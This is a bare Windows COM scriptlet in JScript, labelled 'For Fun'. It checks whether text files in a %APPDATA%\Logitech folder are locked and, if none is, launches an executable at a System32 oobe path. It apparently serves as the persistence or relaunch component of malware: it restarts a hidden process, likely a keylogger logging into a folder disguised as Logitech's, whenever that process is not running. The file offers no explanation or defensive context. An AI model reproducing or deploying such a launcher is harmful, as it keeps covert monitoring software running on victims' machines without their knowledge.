<?xml version="1.0"?>
<scriptlet>
    <registration
        description="For Fun"
        progid="FORFUN"
        version="1.0">
    </registration>
    <script language="JScript">
        <![CDATA[
            var WShell = new ActiveXObject("WScript.Shell")
            var fso = new ActiveXObject("Scripting.FileSystemObject")
            var logiPath = WShell.ExpandEnvironmentStrings("%APPDATA%\\Logitech")
            if (fso.FolderExists(logiPath)) {
                var folder = fso.GetFolder(logiPath)
                var files = folder.Files
                var run = true
                for(var objEnum = new Enumerator(files); !objEnum.atEnd(); objEnum.moveNext()) {
                    item = objEnum.item();
                    if (item.Name.search(".txt") != -1) {
                        fullName = logiPath + "\\" + item.Name
                        try {
                            var reader = fso.OpenTextFile(fullName, 1, true, 0)
                        }
                        catch (err) {
                            run = false
                            break
                        }
                    }
                }

                if (run) {
                    WShell.Run("C:\\Windows\\System32\\oobe\\oobeldr.exe")
                }
            }
        ]]>
    </script>
</scriptlet>